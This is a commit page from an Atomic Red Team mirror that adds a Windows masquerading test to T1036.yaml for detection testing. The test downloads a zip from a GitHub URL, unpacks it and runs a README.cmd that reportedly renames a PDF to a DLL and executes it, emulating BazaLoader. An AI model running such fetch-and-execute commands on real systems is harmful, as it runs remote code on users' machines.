security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1036 (#1763)

Browse Source 
* T1036

* Update T1036.yaml

* updated description

* correct outfile param

* Add -force to avoid error msg

* update zip url

Co-authored-by: Riley <lriley@NTI.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
lucasRiley
2022-02-07 09:04:43 -06:00
committed by GitHub
parent effcf8b023
commit e029a0734d
2 changed files with 26 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1036/T1036.yaml
+26 -2
View File
@@ -2,7 +2,7 @@ attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
@@ -11,4 +11,28 @@ atomic_tests:
copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
start %ALLUSERSPROFILE%\cmd.exe
cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
name: command_prompt
name: command_prompt
- name: Malware Masquerading and Execution from Zip File
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: Url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
atomics/T1036/bin/T1036.zip
BIN
View File
Binary file not shown.